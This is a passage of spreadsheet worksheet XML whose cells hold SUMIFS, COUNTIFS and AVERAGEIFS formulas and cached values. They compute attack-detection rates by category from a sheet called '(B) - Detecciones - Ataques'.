        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="W162" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="Z162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.3470256524</v>
      </c>
      <c r="AA162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.4711538462</v>
      </c>
      <c r="AB162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AC162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AD162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.00119760479</v>
      </c>
      <c r="AE162" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="AF162" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AG162" s="271"/>
      <c r="AH162" s="352" t="s">
        <v>2586</v>
      </c>
      <c r="AI162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AJ162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3578947368</v>
      </c>
      <c r="AR162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AV162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AW162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AY162" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB162" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="BD162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="BN162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="BO162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="BR162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="BT162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="CA162" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC162" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="CG162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="CJ162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="CP162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CQ162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="CU162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH162" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI162" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ162" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="DK162" s="271"/>
    </row>
    <row r="163">
      <c r="J163" s="277"/>
      <c r="K163" s="512"/>
      <c r="L163" s="512"/>
      <c r="M163" s="512"/>
      <c r="N163" s="512"/>
      <c r="O163" s="278"/>
      <c r="Q163" s="271"/>
      <c r="R163" s="352" t="s">
        <v>2587</v>
      </c>
      <c r="S163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.3351941748</v>
      </c>
      <c r="T163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.4842105263</v>
      </c>
      <c r="V163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="W163" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y163" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GP$3:$GP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
